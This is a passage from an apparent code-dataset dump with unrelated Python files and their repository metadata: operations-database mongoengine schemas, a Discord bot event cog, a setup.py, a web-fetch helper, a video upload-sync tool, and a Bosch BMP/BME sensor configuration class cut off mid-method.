comment = StringField(required=True)
time = IntField(required=True,help_text='epoch')
author = IntField(required=True,help_text=' who created comment')
author_name = StringField(required=True,help_text=' who created comment')
id = IntField(required=True,help_text='Auto generated id @optional')
classes.append(oss_comment)
class oss_componenttype(Document):
type = StringField(required=True)
description = StringField(required=True)
supportremarks = StringField(required=True)
id = IntField(required=True,help_text='Auto generated id @optional')
classes.append(oss_componenttype)
class oss_sprint(Document):
id = IntField(required=True)
name = StringField(required=True)
description = StringField(required=True)
start = IntField(required=True,help_text='epoch')
stop = IntField(required=True,help_text='epoch')
organizations = ListField(StringField(), default=list,help_text='organizations involved with this sprint')
organizations_names = StringField(required=True,help_text='comma separated list of names of orgs')
acl = ListField(field=StringField(), default=list,help_text='dict where key is name of group; value is R/W/E (E=Execute)')
comments = ListField(StringField(), default=list,help_text='reference to comments')
classes.append(oss_sprint)
class oss_ticket(Document):
id = IntField(required=True)
name = StringField(required=True)
description = StringField(required=True)
priority = IntField(required=True,help_text='level 0-4 (4 is most urgent)')
project = StringField(required=True,help_text='link to project')
project_name = StringField(required=True)
type = StringField(required=True)
parent = StringField(required=True)
parent_name = StringField(required=True)
depends = ListField(StringField(), default=list,help_text='this task depends on')
depends_names = ListField(StringField(), default=list,)
deadline = IntField(required=True,help_text='epoch of when task needs to be done')
duplicate = ListField(StringField(), default=list,help_text='list of duplicates to this issue')
duplicate_names = ListField(StringField(), default=list,)
taskowner = StringField(required=True,help_text='owner of task (user)')
taskowner_name = StringField(required=True,help_text='owner of task (user)')
source = StringField(required=True,help_text='owner of task (user)')
source_name = StringField(required=True,help_text='name of user where request came from (can be email, username, ...)')
sprint = StringField(required=True)
sprint_name = StringField(required=True)
organization = StringField(required=True,help_text=' link to organization if any')
organization_name = StringField(required=True)
nextstepdate = IntField(required=True,help_text='date for next day to continue with this ticket')
workflow = StringField(required=True,help_text='current active workflow')
job_status = StringField(required=True,help_text='values are:')
jobs = ListField(StringField(), default=list,help_text='link to workflows')
time_created = IntField(required=True)
time_lastmessage = IntField(required=True)
time_lastresponse = IntField(required=True)
time_closed = IntField(required=True)
messages = ListField(StringField(), default=list,help_text=' reference to message')
comments = ListField(StringField(), default=list,help_text='reference to comments')
datasources = ListField(StringField(), default=list,help_text='source(s) where data comes from (reference)')
acl = ListField(field=StringField(), default=list,help_text='dict where key is name of group; value is R/W/E (E=Execute)')
params = StringField(required=True,help_text='json representation of dict which has all arguments required for this ticket')
classes.append(oss_ticket)
class oss_group(Document):
id = IntField(required=True)
name = StringField(required=True)
addresses = ListField(StringField(), default=list,help_text='reference to addr')
members = ListField(StringField(), default=list,help_text='users in group (based on ids)')
members_name = ListField(StringField(), default=list,)
comments = ListField(StringField(), default=list,help_text='reference to comments')
contactmethods = ListField(StringField(), default=list,help_text='reference to contactmethods')
datasources = ListField(StringField(), default=list,help_text='source(s) where data comes from (reference)')
acl = ListField(field=StringField(), default=list,help_text='dict where key is name of group; value is R/W/E (E=Execute)')
classes.append(oss_group)
class oss_service(Document):
id = IntField(required=True)
name = StringField(required=True)
organization = StringField(required=True,help_text='id of organization which owns the service if any')
organization_name = StringField(required=True)
label = StringField(required=True)
parent = IntField(required=True)
parent_name = StringField(required=True)
description = StringField(required=True)
type = StringField(required=True)
serviceports = ListField(StringField(), default=list,)
depends = ListField(StringField(), default=list,help_text=' link to other services (what does it need to work)')
depends_names = ListField(StringField(), default=list,)
machinehost = IntField(required=True,help_text='who is machine hosting this service')
memory = IntField(required=True,help_text='in GB')
ssdcapacity = IntField(required=True,help_text='in GB')
hdcapacity = IntField(required=True,help_text='in GB')
cpumhz = IntField(required=True,help_text='in mhz')
nrcores = IntField(required=True)
nrcpu = IntField(required=True)
admin_name = StringField(required=True,help_text='name of admin e.g. admin or root')
admin_passwd = StringField(required=True,help_text='encrypted root passwd')
acl = ListField(field=StringField(), default=list,help_text='dict where key is name of group; value is R/W/E (E=Execute)')
comments = ListField(StringField(), default=list,help_text='reference to comments')
classes.append(oss_service)
class oss_serviceport(Document):
id = IntField(required=True)
serviceid = IntField(required=True)
ipaddr = StringField(required=True,help_text=' e.g. 192.168.10.1/24')
ipaddr6 = StringField(required=True)
url = StringField(required=True)
port = StringField(required=True)
type = StringField(required=True)
description = StringField(required=True)
supportremarks = StringField(required=True)
comments = ListField(StringField(), default=list,help_text='reference to comments')
classes.append(oss_serviceport)
class oss_machine(Document):
id = IntField(required=True)
name = StringField(required=True)
organization = StringField(required=True,help_text='id of organization which owns the machine if any')
organization_name = StringField(required=True)
label = StringField(required=True)
parent = IntField(required=True)
parent_name = StringField(required=True)
description = StringField(required=True)
type = StringField(required=True)
interfaces = ListField(StringField(), default=list,)
depends = ListField(StringField(), default=list,help_text=' link to other machines (what does it need to work)')
depends_names = ListField(StringField(), default=list,)
assethost = IntField(required=True,help_text='who is asset hosting this machinehost')
memory = IntField(required=True,help_text='in GB')
ssdcapacity = IntField(required=True,help_text='in GB')
hdcapacity = IntField(required=True,help_text='in GB')
cpumhz = IntField(required=True,help_text='in mhz')
nrcores = IntField(required=True)
nrcpu = IntField(required=True)
rootpasswd = StringField(required=True,help_text='encrypted root passwd')
acl = ListField(field=StringField(), default=list,help_text='dict where key is name of group; value is R/W/E (E=Execute)')
comments = ListField(StringField(), default=list,help_text='reference to comments')
classes.append(oss_machine)
class oss_workflowstep(Document):
id = IntField(required=True)
name = StringField(required=True)
description = StringField(required=True)
warningtime = IntField(required=True,help_text=' time that this step can take till warning (in sec)')
criticaltime = IntField(required=True,help_text=' time that this step can take')
nextsteps = ListField(field=StringField(), default=list,)
nextsteps_error = ListField(field=StringField(), default=list,)
jscript = StringField(required=True,help_text='this script will create jobsteps (like branches of a tree) and return all next jobsteps to execute')
comments = ListField(StringField(), default=list,help_text='reference to comments')
classes.append(oss_workflowstep)
class oss_asset(Document):
id = IntField(required=True)
organization = StringField(required=True,help_text='id of organization which owns the asset if any')
organization_names = StringField(required=True,help_text='comma separated list of name')
label = StringField(required=True)
parent = StringField(required=True)
parent_name = StringField(required=True)
description = StringField(required=True)
type = StringField(required=True)
brand = StringField(required=True)
model = StringField(required=True)
interfaces = ListField(StringField(), default=list,)
components = ListField(StringField(), default=list,)
depends = ListField(StringField(), default=list,help_text=' link to other assets (what does it need to work)')
depends_names = ListField(StringField(), default=list,)
rack = StringField(required=True)
datacenter_name = StringField(required=True)
pod_name = StringField(required=True)
rack_name = StringField(required=True)
datacenter_label = StringField(required=True)
pod_label = StringField(required=True)
rack_label = StringField(required=True)
u = IntField(required=True,help_text='how many U taken')
rackpos = IntField(required=True,help_text=' how many U starting from bottomn')
acl = ListField(field=StringField(), default=list,help_text='dict where key is name of group; value is R/W/E (E=Execute)')
comments = ListField(StringField(), default=list,help_text='reference to comments')
classes.append(oss_asset)
class oss_document(Document):
id = IntField(required=True)
parent = IntField(required=True,help_text='parent doc (where this document is a version of)')
name = StringField(required=True)
creationdate = IntField(required=True)
moddate = IntField(required=True)
type = StringField(required=True,help_text=' SPREADSHEET:DOC:TXT:CODE:...')
ext = StringField(required=True,help_text=' e.g. docx;xls;...')
contents = StringField(required=True,help_text='full text content')
objstorid = StringField(required=True,help_text='reference on doc mgmt system (stored in sort of key value obj store)')
description = StringField(required=True)
acl = ListField(field=StringField(), default=list,help_text='dict where key is name of group; value is R/W/E (E=Execute)')
comments = ListField(StringField(), default=list,help_text='reference to comments')
classes.append(oss_document)
class oss_assettype(Document):
type = StringField(required=True)
description = StringField(required=True)
supportremarks = StringField(required=True)
id = IntField(required=True,help_text='Auto generated id @optional')
classes.append(oss_assettype)
class oss_workflow(Document):
id = IntField(required=True)
name = StringField(required=True)
tickettype = StringField(required=True)
description = StringField(required=True)
workflowsteps = ListField(StringField(), default=list,)
acl = ListField(field=StringField(), default=list,help_text='dict where key is name of group; value is R/W/E (E=Execute)')
comments = ListField(StringField(), default=list,help_text='reference to comments')
classes.append(oss_workflow)
class oss_component(Document):
type = StringField(required=True)
nr = IntField(required=True,help_text='amount of component e.g. 2 CPU')
brand = StringField(required=True)
model = StringField(required=True)
description = StringField(required=True)
supportremarks = StringField(required=True)
comments = ListField(StringField(), default=list,help_text='reference to comments')
id = IntField(required=True,help_text='Auto generated id @optional')
classes.append(oss_component)
class oss_job(Document):
id = IntField(required=True)
workflow = StringField(required=True)
workflow_name = StringField(required=True)
startdate = IntField(required=True,help_text='epoch')
enddate = IntField(required=True,help_text='epoch')
status = StringField(required=True,help_text='values are:')
classes.append(oss_job)
class oss_user(Document):
id = IntField(required=True)
organizations = ListField(StringField(), default=list,)
organization_names = StringField(required=True)
name = StringField(required=True)
addresses = ListField(StringField(), default=list,help_text='reference to addr (guid)')
comments = ListField(StringField(), default=list,help_text='reference to comments')
userids = ListField(StringField(), default=list,)
contactmethods = ListField(StringField(), default=list,help_text='reference to contactmethods')
datasources = ListField(StringField(), default=list,help_text='source(s) where data comes from (reference)')
acl = ListField(field=StringField(), default=list,help_text='dict where key is name of group; value is R/W/E (E=Execute)')
classes.append(oss_user)
class oss_address(Document):
id = IntField(required=True)
country = StringField(required=True)
city = StringField(required=True)
citycode = StringField(required=True)
zone = StringField(required=True)
region = StringField(required=True)
street = StringField(required=True)
nr = IntField(required=True)
floor = IntField(required=True)
classes.append(oss_address)
class oss_interface(Document):
type = StringField(required=True)
macaddr = StringField(required=True)
vlanid = StringField(required=True)
vxlanid = StringField(required=True)
organization = StringField(required=True,help_text='id of organization which owns the ipaddr if any')
netaddr = ListField(StringField(), default=list,)
connects = ListField(StringField(), default=list,help_text=' link to other interfaces')
brand = StringField(required=True)
model = StringField(required=True)
description = StringField(required=True)
supportremarks = StringField(required=True)
comments = ListField(StringField(), default=list,help_text='reference to comments')
id = IntField(required=True,help_text='Auto generated id @optional')
classes.append(oss_interface)
class oss_contactmethod(Document):
id = IntField(required=True)
type = StringField(required=True)
value = StringField(required=True,help_text='e.g. tel nr')
classes.append(oss_contactmethod)
class oss_jobstep(Document):
jobguid = StringField(required=True,help_text='reference to job')
workflow = StringField(required=True)
workflowstep = StringField(required=True,help_text='reference to workflowstep which started this jobsteps')
workflowstep_name = StringField(required=True)
description = StringField(required=True)
order = IntField(required=True,help_text='order in which the steps where executed')
params = StringField(required=True,help_text='json representation of dict which has all arguments')
warningtime = IntField(required=True,help_text=' time that this step can take till warning (in sec)')
criticaltime = IntField(required=True,help_text=' time that this step can take')
startdate = IntField(required=True)
enddate = IntField(required=True)
jscript = StringField(required=True,help_text='script which was executed')
status = StringField(required=True,help_text='values are:')
nextsteps = ListField(StringField(), default=list,help_text='after resolving the script next steps which were triggered (so is after execution), is references to other jobsteps (guid)')
logs = StringField(required=True)
id = IntField(required=True,help_text='Auto generated id @optional')
classes.append(oss_jobstep)
class oss_brandtype(Document):
type = StringField(required=True)
description = StringField(required=True)
supportremarks = StringField(required=True)
id = IntField(required=True,help_text='Auto generated id @optional')
classes.append(oss_brandtype)
class oss_datacenter(Document):
id = IntField(required=True)
name = StringField(required=True)
label = StringField(required=True)
organization = StringField(required=True,help_text='id of organization which owns dc')
organization_name = StringField(required=True)
description = StringField(required=True)
addresses = ListField(StringField(), default=list,help_text='reference to addr')
acl = ListField(field=StringField(), default=list,help_text='dict where key is name of group; value is R/W/E (E=Execute)')
comments = ListField(StringField(), default=list,help_text='reference to comments')
classes.append(oss_datacenter)
class oss_useridentification(Document):
userid = IntField(required=True,help_text=' reference to user')
type = StringField(required=True,help_text=' PASSPORT:ID:DRIVINGLICENSE')
identificationnr = StringField(required=True,help_text='e.g. passport nr')
registrationdate = IntField(required=True,help_text=' epoch')
expirationdate = IntField(required=True,help_text=' epoch')
description = StringField(required=True)
status = StringField(required=True,help_text='VALID:EXPIRED:ERROR')
id = IntField(required=True,help_text='Auto generated id @optional')
classes.append(oss_useridentification)
class oss_message(Document):
subject = StringField(required=True)
message = StringField(required=True)
destination = ListField(StringField(), default=list,)
time = IntField(required=True,help_text='epoch')
type = StringField(required=True,help_text='types are: email;sms;gtalk;tel')
format = StringField(required=True,help_text=' html;confl;md;text default is text')
ticket = IntField(required=True)
comments = ListField(StringField(), default=list,help_text='reference to comments')
id = IntField(required=True,help_text='Auto generated id @optional')
classes.append(oss_message)
class oss_netaddr(Document):
id = IntField(required=True)
ipaddr = StringField(required=True,help_text=' e.g. 192.168.10.1/24')
ipaddr6 = StringField(required=True)
description = StringField(required=True)
supportremarks = StringField(required=True)
comments = ListField(StringField(), default=list,help_text='reference to comments')
classes.append(oss_netaddr)
class oss_project(Document):
id = IntField(required=True)
name = StringField(required=True)
descr = StringField(required=True)
organizations = ListField(StringField(), default=list,help_text='which organizations is proj linked to')
organizations_names = StringField(required=True,help_text='comma separated list of names of orgs')
deadline = IntField(required=True,help_text='epoch of when task needs to be done')
acl = ListField(field=StringField(), default=list,help_text='dict where key is name of group; value is R/W/E (E=Execute)')
comments = ListField(StringField(), default=list,help_text='reference to comments')
classes.append(oss_project)
class oss_interfacetype(Document):
type = StringField(required=True)
description = StringField(required=True)
supportremarks = StringField(required=True)
id = IntField(required=True,help_text='Auto generated id @optional')
classes.append(oss_interfacetype)
class oss_organization(Document):
name = StringField(required=True,help_text='domain')
id = IntField(required=True)
description = StringField(required=True)
companyname = StringField(required=True,help_text='optional name')
parent = StringField(required=True,help_text='organization can belong to other organization')
parent_name = StringField(required=True)
addresses = ListField(StringField(), default=list,help_text='reference to addresses (guid)')
contactmethods = ListField(StringField(), default=list,help_text='reference to contactmethod (guid)')
vatnr = StringField(required=True)
datasources = ListField(StringField(), default=list,help_text='source(s) where data comes from (reference)')
acl = ListField(field=StringField(), default=list,help_text='dict where key is name of group; value is R/W/E (E=Execute)')
comments = ListField(StringField(), default=list,help_text='reference to comments')
classes.append(oss_organization)
class oss_pod(Document):
id = IntField(required=True)
name = StringField(required=True)
label = StringField(required=True)
organization = StringField(required=True,help_text='id of organization which owns the pod if any')
organization_name = StringField(required=True)
datacenter = StringField(required=True)
datacenter_name = StringField(required=True)
description = StringField(required=True)
acl = ListField(field=StringField(), default=list,help_text='dict where key is name of group; value is R/W/E (E=Execute)')
comments = ListField(StringField(), default=list,help_text='reference to comments')
classes.append(oss_pod)
class oss_rack(Document):
id = IntField(required=True)
name = StringField(required=True)
label = StringField(required=True)
pod = StringField(required=True)
pod_name = StringField(required=True)
datacenter = StringField(required=True)
datacenter_name = StringField(required=True)
organization = StringField(required=True,help_text='id of organization which owns the rack if any')
organization_name = StringField(required=True)
description = StringField(required=True)
acl = ListField(field=StringField(), default=list,help_text='dict where key is name of group; value is R/W/E (E=Execute)')
comments = ListField(StringField(), default=list,help_text='reference to comments')
classes.append(oss_rack)
| 54.125301 | 190 | 0.747885 |
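A hedged sketch of using one of the generated mongoengine documents above; the import path, database name, and field values are hypothetical, and a running MongoDB instance is assumed:

from mongoengine import connect
from oss import oss_address   # module name assumed from the record's path

connect("oss_test")           # hypothetical local database
# note: these generated classes declare their own integer id field
addr = oss_address(id=1, country="BE", city="Ghent", citycode="9000",
                   zone="center", region="East Flanders", street="Main", nr=12, floor=2)
addr.save()
print(oss_address.objects(city="Ghent").count())  # 1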
caebb177a6d5c87f8b09e0507f76b02ac300af12 | 185 | py | Python | init/CreateParam.py | Berni1557/MDDoc | 06dd3cae302e6f125ebfbb2fc513bb754d72f07d | ["BSD-3-Clause"] | null | null | null | init/CreateParam.py | Berni1557/MDDoc | 06dd3cae302e6f125ebfbb2fc513bb754d72f07d | ["BSD-3-Clause"] | null | null | null | init/CreateParam.py | Berni1557/MDDoc | 06dd3cae302e6f125ebfbb2fc513bb754d72f07d | ["BSD-3-Clause"] | null | null | null |
# Import Param
import Param
xmlpath = 'H:/cloud/cloud_data/Projects/MDDoc/init/init.xml'
Param.param.init(xmlpath)
Param.param.create()
Param.param.write()
Param.param.printParams()
| 16.818182 | 60 | 0.767568 |
848f7764f06e631c725d13876bb49955114770d1 | 3,754 | py | Python | Extensions/Event-Handler.py | Drageast/Die_Botin | b574166a37c0f92c34db99931c8c894390fbead9 | ["BSD-3-Clause"] | null | null | null | Extensions/Event-Handler.py | Drageast/Die_Botin | b574166a37c0f92c34db99931c8c894390fbead9 | ["BSD-3-Clause"] | null | null | null | Extensions/Event-Handler.py | Drageast/Die_Botin | b574166a37c0f92c34db99931c8c894390fbead9 | ["BSD-3-Clause"] | null | null | null |
# Import
from discord.ext import commands
import discord
import asyncio
# Utils
import Utils
# Cog Initialising
class EventHandler(commands.Cog):
def __init__(self, client):
self.client = client
@commands.Cog.listener()
async def on_member_remove(self, user: discord.Member):
try:
await Utils.DBPreconditioning.DEL_Uccount(self, user)
except:
pass
@commands.Cog.listener()
async def on_voice_state_update(self, member, before, after):
if after.channel is None:
return
elif after.channel.id == Utils.YamlContainerManagement.GET_yamlAttr("Variablen", "SpecifiedChannels", "SupportChannelVOICE") and not member.bot:
channel = await self.client.fetch_channel(Utils.YamlContainerManagement.GET_yamlAttr("Variablen", "SpecifiedChannels", "AdminChat"))
role1 = discord.utils.get(member.guild.roles, name=str(Utils.YamlContainerManagement.GET_yamlAttr("Variablen", "Universals", "Roles", "ServerTeam", "Owner")))
role2 = discord.utils.get(member.guild.roles, name=str(Utils.YamlContainerManagement.GET_yamlAttr("Variablen", "Universals", "Roles", "ServerTeam", "Administrator")))
role3 = discord.utils.get(member.guild.roles, name=str(Utils.YamlContainerManagement.GET_yamlAttr("Variablen", "Universals", "Roles", "ServerTeam", "Developer")))
embed = discord.Embed(
title="Support Anfrage:",
colour=discord.Colour(Utils.Farbe.Orange),
description=f"**{role1.mention}/{role2.mention}/{role3.mention}**\nDer User: `{member.name}` wartet in dem Sprachkanal: `{after.channel.name}`."
)
embed.set_thumbnail(url=member.avatar_url)
m = await channel.send(embed=embed)
await asyncio.sleep(120)
await m.delete()
else:
pass
@commands.Cog.listener()
async def on_member_join(self, user: discord.Member):
embed = discord.Embed(
title=f"Hallo {user.name}!",
colour=discord.Colour(Utils.Farbe.Welcome_Blue),
description=f"Hallo {user.mention} willkommen auf dem Discord Server:\n**{user.guild.name}** !\nUm Spieler zu suchen, gehe in den Korrespondierenden Kanal,\n"
f"die Angepinnte Nachricht oben im Chat erklärt, wie es funktioniert.\n**Viel Spaß!**"
)
embed.set_thumbnail(url=self.client.user.avatar_url)
embed.set_image(url=user.avatar_url)
channel = discord.utils.get(user.guild.text_channels, name=str(
Utils.YamlContainerManagement.GET_yamlAttr("Variablen", "SpecifiedChannels", "Welcome").lower()))
m = await channel.send(embed=embed)
role = discord.utils.get(user.guild.roles, name=str(Utils.YamlContainerManagement.GET_yamlAttr("Variablen", "Universals", "Roles", "Standart")))
await user.add_roles(role)
await asyncio.sleep(300)
try:
await m.delete()
except:
pass
@commands.Cog.listener()
async def on_guild_join(self, guild: discord.Guild):
embed = discord.Embed(
title="Hallo!",
colour=discord.Colour(Utils.Farbe.Welcomer_Blue),
description=f"Hallo {guild.default_role.mention}! Ich bin **{self.client.user.name}**.\nIch bin der Discord Bot von [DrageastLP](https://github.com/Drageast).\n"
f"Ich wurde extra für diesen Server geschrieben und freue ich schon, euch zu assistieren."
)
embed.set_image(url=self.client.user.avatar_url)
await guild.text_channels[0].send(embed=embed)
# Cog Finishing
def setup(client):
client.add_cog(EventHandler(client))
| 37.54 | 178 | 0.654502 |
ca8fd2ab0085b7b39f3bc5c5b751494c30581f73 | 617 | py | Python | setup.py | Empythy/geometry-learning | 5300d421ef848c2748a2ba41ced5c6e2fba93200 | ["MIT"] | 21 | 2018-10-09T08:15:29.000Z | 2022-03-16T08:23:08.000Z | setup.py | reinvantveer/Topology-Learning | 5300d421ef848c2748a2ba41ced5c6e2fba93200 | ["MIT"] | 31 | 2017-09-20T13:30:37.000Z | 2018-03-01T13:24:58.000Z | setup.py | reinvantveer/Topology-Learning | 5300d421ef848c2748a2ba41ced5c6e2fba93200 | ["MIT"] | 7 | 2018-11-29T11:39:02.000Z | 2022-01-12T07:10:26.000Z |
#!/usr/bin/env python
from distutils.core import setup
setup(name='Topology learning',
version='1.0',
description='Machine learning experiments for geospatial vector geometries',
author='Rein van \'t Veer',
author_email='[email protected]',
url='https://github.com/reinvantveer/Topology-Learning',
packages=['model', 'model.topoml_util', 'model.baseline'],
license='MIT',
install_requires=[
'sklearn',
'slackclient',
'scipy',
'keras',
'numpy',
'shapely',
'tensorflow-gpu'
],
)
| 26.826087 | 82 | 0.581848 |
781951c110e1da5ffe988f55cbf188d9b7002060 | 633 | py | Python | top/clearlight/reptile/bilibili/bj_tech_mooc/reptile.py | ClearlightY/Python_learn | 93b9b7efae5a1cf05faf8ee7c5e36dcc99c7a232 | ["Apache-2.0"] | 1 | 2020-01-16T09:23:43.000Z | 2020-01-16T09:23:43.000Z | top/clearlight/reptile/bilibili/bj_tech_mooc/reptile.py | ClearlightY/Python_learn | 93b9b7efae5a1cf05faf8ee7c5e36dcc99c7a232 | ["Apache-2.0"] | null | null | null | top/clearlight/reptile/bilibili/bj_tech_mooc/reptile.py | ClearlightY/Python_learn | 93b9b7efae5a1cf05faf8ee7c5e36dcc99c7a232 | ["Apache-2.0"] | null | null | null |
import requests
# url = 'http://wsjkw.hebei.gov.cn/list/zt_gzfy.html'
# # url = 'http://wjw.beijing.gov.cn/wjwh/ztzl/xxgzbd/gzbdzcfg/index.html'
# r = requests.get(url)
# print(r.status_code)
# # r.encoding = 'utf-8'
# print(r.encoding)
# print(r.apparent_encoding)
# # print(r.text)
def getHTMLTest(url):
try:
r = requests.get(url, timeout=30)
        r.raise_for_status() # raise HTTPError if the status code is not 200
r.encoding = r.apparent_encoding
return r.text
except:
return "产生异常"
# 只有在这个文件下运行才执行, 当在其他文件导入时是不执行的
if __name__ == '__main__':
url = "http://www.baidu.com"
print(getHTMLTest(url))
| 25.32 | 74 | 0.655608 |
019e0fa2051265605135bf611124245d7171f35f | 5,874 | py | Python | synchroload/synchroload.py | rakennus/duraphilms.github.io | bdbecdfb55f4870b5ebf572cd2a7eb4e6770ea22 | ["MIT"] | null | null | null | synchroload/synchroload.py | rakennus/duraphilms.github.io | bdbecdfb55f4870b5ebf572cd2a7eb4e6770ea22 | ["MIT"] | null | null | null | synchroload/synchroload.py | rakennus/duraphilms.github.io | bdbecdfb55f4870b5ebf572cd2a7eb4e6770ea22 | ["MIT"] | null | null | null |
#!/usr/bin/env python3
import argparse
import os
import storage
import downloader
import plugins.archive
import plugins.dropbox
import plugins.dailymotion
import plugins.openload
import plugins.twitch
import plugins.u6656
import plugins.vimeo
import plugins.youtube
import plugins.dummy
from makesprites import SpriteTask
SYNCHROLOAD_PLUGINS = {
"archive": plugins.archive,
"dropbox": plugins.dropbox,
"dailymotion": plugins.dailymotion,
"openload": plugins.openload,
"twitch": plugins.twitch,
"u6656": plugins.u6656,
"vimeo": plugins.vimeo,
"youtube": plugins.youtube,
"dummy": plugins.dummy
}
parser = argparse.ArgumentParser(description='Synchronize video uploads across hosting services')
parser.add_argument("--part", type=str)
parser.add_argument("--playlist", type=str)
parser.add_argument("--hoster", type=str)
parser.add_argument("--resolution", type=int, default=-1)
parser.add_argument("--download", action="store_true")
parser.add_argument("--upload", action="store_true")
parser.add_argument("--delete-offline", action="store_true")
parser.add_argument("--gen-vtt", action="store_true")
args = parser.parse_args()
db = storage.Database()
def pluginByName(pluginName):
return SYNCHROLOAD_PLUGINS[pluginName]
def check_availability(video, upload, playlist, part):
plugin = SYNCHROLOAD_PLUGINS[upload.hoster]
print("[check online] Checking availability for {} {} on {} ({}) ...".format(playlist.name, part, plugin.HOSTER_NAME, upload.id), end="")
if not downloader.check_availability(plugin.linkFromId(upload.id)):
if plugin.HOSTER_KEEP_UNAVAILABLE_UPLOADS:
print(" [FAIL] - Disabling!")
video.disableUpload(upload.id)
else:
print(" [FAIL] - Removing!")
video.removeUpload(upload.id)
else:
print(" [OK]")
def findLocalVideo(playlist, video, version = None, resolution = None, containers = ["mp4", "webm", "mkv"]):
if version:
versions = [version]
else:
versions = storage.VIDEO_VERSIONS
if resolution:
resolutions = [resolution]
else:
resolutions = [2160, 1440, 1080, 720, 540, 480, 360, 240, 144]
upload = storage.Upload()
for version in versions:
upload.version = version
for resolution in resolutions:
upload.resolution = resolution
base = db.getVideoFilenameBase(video, upload, playlist = playlist)
for container in containers:
fileName = base + "." + container
if os.path.isfile(fileName):
return upload, fileName
return "", ""
def getPlaylist(playlistName):
playlist = db.getPlaylistByName(playlistName)
if playlist:
return playlist
print("No such playlist: " + playlistName)
exit(1)
def getVideo(playlist, part):
video = playlist.getVideo(part)
if video:
return video
print("No such video: " + str(part))
exit(1)
def getUpload(video, hoster, resolution):
    upload = video.getUpload(hoster, resolution)
    if upload:
        return upload
    print("No upload for this hoster: " + hoster)
exit(1)
def importU6656(playlist):
baseId = "hpudpva"
if playlist == "OdP":
baseId = "hpudodp"
plist = getPlaylist(playlist)
for video in plist.videos:
upl = storage.Upload()
upl.hoster = "u6656"
upl.id = baseId + "/" + video.id + ".mp4"
upl.origin = "youtube"
upl.resolution = 720
video.uploads.append(upl)
if __name__ == "__main__":
if args.delete_offline:
for playlist in db.playlists:
for video in playlist.videos:
for upload in video.uploads:
check_availability(video, upload, playlist, video.id)
db.save()
if args.download:
playlist = getPlaylist(args.playlist)
video = getVideo(playlist, args.part)
upload = getUpload(video, args.hoster, args.resolution)
plugin = pluginByName(args.hoster)
url = plugin.linkFromId(upload.id)
filename = db.getVideoFilenameBase(video, upload, playlist = playlist)
if plugin.HOSTER_HAS_DIRECT_LINKS:
download = downloader.downloadDirect(url, filename)
else:
download = downloader.download(url, filename)
if download:
print("Downloaded video to: {}".format(download))
else:
print("Could not download video from {}.".format(plugin.HOSTER_NAME))
exit(1)
if args.upload:
plugin = pluginByName(args.hoster)
if not plugin:
print("Could not upload: unknown hoster.")
exit(1)
playlist = getPlaylist(args.playlist)
video = getVideo(playlist, args.part)
(upload, fileName) = findLocalVideo(playlist, video)
upload.hoster = args.hoster
upload.id = plugin.upload(fileName)
if upload.id:
video.uploads.append(upload)
if args.gen_vtt:
playlist = getPlaylist(args.playlist)
video = getVideo(playlist, args.part)
source = ""
if args.hoster:
upload = getUpload(video, args.hoster, args.resolution)
plugin = pluginByName(args.hoster)
url = plugin.linkFromId(upload.id)
source = url
else:
(upload, fileName) = findLocalVideo(playlist, video)
source = fileName
task = SpriteTask(source)
task.vttfile = "thumbs/vtt/{}_{}.vtt".format(playlist.name, video.id)
task.spritefile = "thumbs/vtt/{}_{}.jpg".format(playlist.name, video.id)
task.thumb_rate_seconds = 5
task.thumb_width = 200
task.outdir = "/tmp/spritesgen"
task.use_sips = False
task.makeOutDir("/tmp/spritesgen")
task.run()
db.save()
| 29.079208 | 141 | 0.633299 |
01e5ab5afb36fac229d7dcc098109d6d110740ac | 20,853 | py | Python | phypidaq/BMPx80Config.py | RMGrau/PhyPiDAQ | e7ea08a0d5de9772a1a5e32ccd0ab1bfddf9ff54 | ["BSD-2-Clause"] | 7 | 2018-11-30T13:38:27.000Z | 2021-03-10T15:37:56.000Z | phypidaq/BMPx80Config.py | RMGrau/PhyPiDAQ | e7ea08a0d5de9772a1a5e32ccd0ab1bfddf9ff54 | ["BSD-2-Clause"] | 5 | 2020-11-11T09:19:00.000Z | 2022-02-06T09:04:55.000Z | phypidaq/BMPx80Config.py | RMGrau/PhyPiDAQ | e7ea08a0d5de9772a1a5e32ccd0ab1bfddf9ff54 | ["BSD-2-Clause"] | 16 | 2019-04-16T10:15:45.000Z | 2021-12-15T14:59:31.000Z |
# -*- coding: utf-8 -*-
from __future__ import print_function, division, unicode_literals
from __future__ import absolute_import
import numpy as np, time, sys, smbus
# default addresses and ChipIDs of Bosch BMP 085/180 and BMP/E 280 sensors
BMP_I2CADDR = 0x77
BMP_I2CADDR2 = 0x76
#BMP_I2CADDR = 0x76 # alternative device I2C address
BMP180_CHIPID = 0x55
BMP280_CHIPID = 0x58
BME280_CHIPID = 0x60
# ID register:
REG_ID = 0xD0
# code of driver classes included below
class BMPx80Config(object):
'''digital thermometer DS18B20Config configuration and interface'''
def __init__(self, confdict = None):
self.BMP_I2CADDR = BMP_I2CADDR
if confdict==None: confdict={}
if 'I2CADDR' in confdict:
self.BMP_I2CADDR = confdict['I2CADDR']
print("BMPx80: I2C address set to %x "%(self.BMP_I2CADDR) )
if 'NChannels' in confdict:
self.NChannels = confdict["NChannels"]
else:
self.NChannels = 2
self.ChanLims = [[-40., 85.],[300., 1100.], [0., 100.]]
self.ChanNams = ['T','P', 'H']
self.ChanUnits= ['°C','hPa', '%']
def init(self):
try:
# set up I2C bus
busnum = 1
bus = smbus.SMBus(busnum) # Rev 2 Pi, Pi 2 & Pi 3 uses bus 1
# Rev 1 Pi uses bus 0
except Exception as e:
print("BMPx80: Error initialising I2C bus - exit")
print(str(e))
sys.exit(1)
try:
try:
# find out which sensor we have:
(self.chipID,) = bus.read_i2c_block_data(self.BMP_I2CADDR, REG_ID, 1)
except:
# try secondary address (BMP280)
print("BMPx80: trying secondary address %x "%(BMP_I2CADDR2) )
(self.chipID,) = bus.read_i2c_block_data(BMP_I2CADDR2, REG_ID, 1)
self.BMP_I2CADDR = BMP_I2CADDR2
# set up sensor
print("BMPx80: ChipID %x "%(self.chipID) )
if self.chipID == BMP180_CHIPID:
self.sensor = BMP085(address=self.BMP_I2CADDR, busnum=busnum, i2c_interface=smbus.SMBus)
elif self.chipID == BMP280_CHIPID:
self.sensor = BMP280(address=self.BMP_I2CADDR, busnum=busnum, i2c_interface=smbus.SMBus)
elif self.chipID == BME280_CHIPID:
self.sensor = BME280(address=self.BMP_I2CADDR, i2c = bus)
else:
print("BMPx80: unknown chip ID - exiting")
sys.exit(1)
except Exception as e:
print("BMPx80: Error setting up device - exit")
print(str(e))
sys.exit(1)
def acquireData(self, buf):
if self.chipID == BME280_CHIPID:
